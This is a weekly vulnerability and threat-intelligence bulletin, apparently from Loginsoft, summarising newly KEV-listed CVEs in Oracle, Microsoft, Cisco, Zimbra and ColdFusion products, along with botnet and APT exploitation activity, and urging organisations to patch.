Cyber threats continue to escalate as four new vulnerabilities were added to the CISA KEV catalog this week, affecting tech giants like Microsoft, Oracle, Adobe and Synacor Zimbra. To make matters worse, active exploitation was detected in Cisco IOS XE Software, reinforcing the ever-growing need for vigilance.  

Botnets continue to advance, with EnemyBot and Sysrv-K targeting Spring Cloud Gateway, while Mozi, Andr0xgh0st, Tsunami, Spytech Necro, and Sysrv ramp up attacks against Atlassian products, posing a growing cybersecurity challenge.

Threat actors are refining their techniques to stay ahead of defenses. UAC-0212, linked to Sandworm (APT44, Seashell Blizzard, UAC-0002), has been exploiting a patched Microsoft Windows vulnerability while the PolarEdge botnet is aggressively targeting Cisco Small Business Routers.  

These advancements highlight the rise of increasingly sophisticated and persistent cyber threats, underscoring the urgency of maintaining vigilance and strengthening security measures.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

‍CVE-2024-20953

A Deserialization Vulnerability in the Oracle Agile Product Lifecycle Management (PLM) version 9.3.6 has been identified with a high CVSS Score of 8.8. This flaw enables a low-privileged attacker with HTTP network access to exploit the affected systems. Given its potential for exploitation, CISA has added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, reinforcing the urgency for organizations to deploy security updates without delay.

‍CVE-2024-49035

An Improper Access Control Vulnerability in the Microsoft Partner Center (partner.microsoft[.]com) allows an unauthenticated attacker to escalate privileges over a network, potentially compromising sensitive operations and data. With a high CVSS Score of 8.7, this flaw poses a significant risk. Microsoft has released a security update to address this vulnerability, and CISA has added it to its KEV catalog, emphasizing the need for immediate remediation.

‍CVE-2023-20198

A critical Privilege Escalation Vulnerability (CVSS 10.0) in the Cisco IOS XE Web UI, affecting versions 17.9, 17.6, 17.3, and 16.12 (for Catalyst 3650 and 3850 only), allows attackers to create administrative user accounts, potentially leading to full system compromise. Recorded Future noted that the Chinese APT group Salt Typhoon (also known as Earth Estries, GhostEmperor, UNC2886 and RedMike) has exploited this vulnerability to compromise over a thousand Cisco devices globally. Recently, GreyNoise has detected active exploitation, with 110 malicious IPs targeting vulnerable systems, primarily from Bulgaria, Brazil, and Singapore. Organizations must urgently apply patches and implement security measures to mitigate this ongoing threat.

‍CVE-2023-34192

A critical Cross-Site Scripting (XSS) Vulnerability (CVSS 9.0) in the Zimbra Collaboration Suite (ZCS) allows remote, authenticated attackers to inject malicious scripts via the /h/autoSaveDraft function. If exploited successfully, this flaw could lead to arbitrary code execution, potentially granting attackers complete control over the compromised systems. Zimbra addressed this vulnerability in July 2023, with the release of version 8.8.15 Patch 40. This flaw has now been added to the CISA KEV catalog.

‍CVE-2017-3066

A critical Deserialization Vulnerability in the Apache BlazeDS library affects Adobe ColdFusion. First reported in 2017, this flaw arises due to ColdFusion's inadequate validation of data during the deserialization process, creating an opportunity for malicious code execution. If exploited, it could lead to unauthorized access, data breaches, and full system compromise. Historically, this vulnerability has been leveraged by the Sysrv Botnet and Rocke Cryptomining malware. Additionally, with proof-of-concept (PoC) available, the risk of exploitation remains high. Acknowledging the serious threat posed by this vulnerability, CISA has listed it in the KEV catalog, prompting organizations to prioritize pathing efforts to minimize exposure.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned. As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.  

CVE-2024-38213

CERT-UA has attributed the UAC-0212 group, a subcluster within the Sandworm hacking collective (also known as APT44, Seashell Blizzard, and UAC-0002), to the exploitation of CVE-2024-38213, a now patched Microsoft Windows security vulnerability. During the second half of 2024, the attackers utilized maliciously crafted documents to exploit this flaw as part of their cyber operations.

‍CVE-2023-20118

Sekoia's Threat Detection and Research (TDR) team has uncovered PolarEdge, a sophisticated IoT-based botnet campaign targeting vulnerable Cisco Small Business Routers and other edge devices. Active since at least late 2023, the botnet has infected over 2000 devices worldwide. The attackers exploited CVE-2023-20118, a remote code execution vulnerability affecting multiple Cisco Small Business Router models, to gain control over compromised devices.  

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/02/24/cisa-adds-two-known-exploited-vulnerabilities-catalog  
2. ‍https://www.cisa.gov/news-events/alerts/2025/02/25/cisa-adds-two-known-exploited-vulnerabilities-catalog  
3. https://www.greynoise.io/blog/greynoise-observes-active-exploitation-of-cisco-vulnerabilities-tied-to-salt-typhoon-attacks  
4. https://blog.sekoia.io/polaredge-unveiling-an-uncovered-iot-botnet/  
5. https://cert.gov.ua/article/6282517